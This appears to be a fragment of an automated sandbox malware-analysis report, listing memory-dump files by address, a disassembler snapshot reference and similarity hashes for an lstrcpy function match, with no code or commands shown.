                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 989f71687098ffce38a040ab63296c8be012d282d998f8fb11ac2d490ce01556
                                • Instruction ID: aaf284311adbc16c33de0d6ef8b19cea2a9eccfd5c21f12ec7fcb801f2255300
                                • Opcode Fuzzy Hash: 989f71687098ffce38a040ab63296c8be012d282d998f8fb11ac2d490ce01556
                                • Instruction Fuzzy Hash: A9112E74A11B02ABDB249F35D65C966B7FCFF44311758052DA89AC7B40EB30E801CB90